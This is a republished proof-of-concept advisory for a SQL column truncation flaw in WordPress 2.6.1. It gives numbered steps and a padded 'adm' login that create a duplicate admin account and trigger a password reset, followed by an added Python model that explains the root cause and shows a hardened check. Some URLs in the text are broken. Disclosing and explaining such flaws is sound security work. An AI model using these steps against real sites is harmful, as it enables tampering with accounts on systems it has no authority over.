WordPress 2.6.1 SQL Column Truncation Vulnerability
Website building | 2023-02-09 11:06 | www.1681989.com
WordPress users should take note.
# WordPress 2.6.1 SQL Column Truncation Vulnerability (PoC)
#
# found by irk4z[at]yahoo.pl
# homepage: http://irk4z.wordpress./
#
# this is not critical vuln [;
#
# first, read this discovery:
# http://.suspekt./2008/08/18/mysql-and-sql-column-truncation-vulnerabilities/
#
# this hack we can remote change adm password, if registration enabled
#
# greets: Stefan Esser, Lukasz Pilorz, cOndemned, tbh, sid.psycho, str0ke and all fiends

1. go to url: server./wp-log.php?action=register

2. register as:

log: adm x
email: your email

^ adm[55 space chars]x

now, we have duplicated 'adm' account in database

3. go to url: server./wp-log.php?action=lostpassword

4. write your email to field and submit this form

5. check your email and go to reset confirmation link

6. adm's password changed, but new password will be sent to correct adm email ;/

# milw0rm.
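The root cause behind the steps above, as an added example that is not part of the original advisory: a toy Python model of a uniqueness check that runs on the raw input while the database stores a truncated value, next to a check that normalises and length-validates first. The 60-character column width, the class and function names and the sample login are assumptions made for illustration.

```python
# Added example: a toy model, not MySQL itself and not WordPress code.
COLUMN_WIDTH = 60  # assumed width of the login column


def stored_value(value, width=COLUMN_WIDTH):
    """Non-strict SQL mode: an over-long string is silently cut to the column width."""
    return value[:width]


def sql_equal(a, b):
    """PAD SPACE collations ignore trailing spaces when comparing strings."""
    return a.rstrip(" ") == b.rstrip(" ")


class UserTable:
    def __init__(self):
        self.rows = []  # (login, email) tuples as the database would hold them

    def matches(self, login):
        """Rows that a WHERE login = ... lookup would return."""
        return [row for row in self.rows if sql_equal(row[0], login)]

    def naive_register(self, login, email):
        # Weak: uniqueness is tested on the raw input, but the truncated
        # form is what ends up stored.
        if self.matches(login):
            return False
        self.rows.append((stored_value(login), email))
        return True

    def hardened_register(self, login, email):
        # Normalise first, refuse anything the column cannot hold unchanged,
        # and only then run the uniqueness check.
        login = " ".join(login.split())
        if not login or len(login) > COLUMN_WIDTH:
            return False
        if self.matches(login):
            return False
        self.rows.append((login, email))
        return True


# Constructed sample input: an existing login padded past the column width.
PADDED = "alice" + " " * 56 + "x"
```

Running the database in a strict SQL mode closes the same gap at the storage layer, because an over-long value is then rejected with an error instead of being truncated.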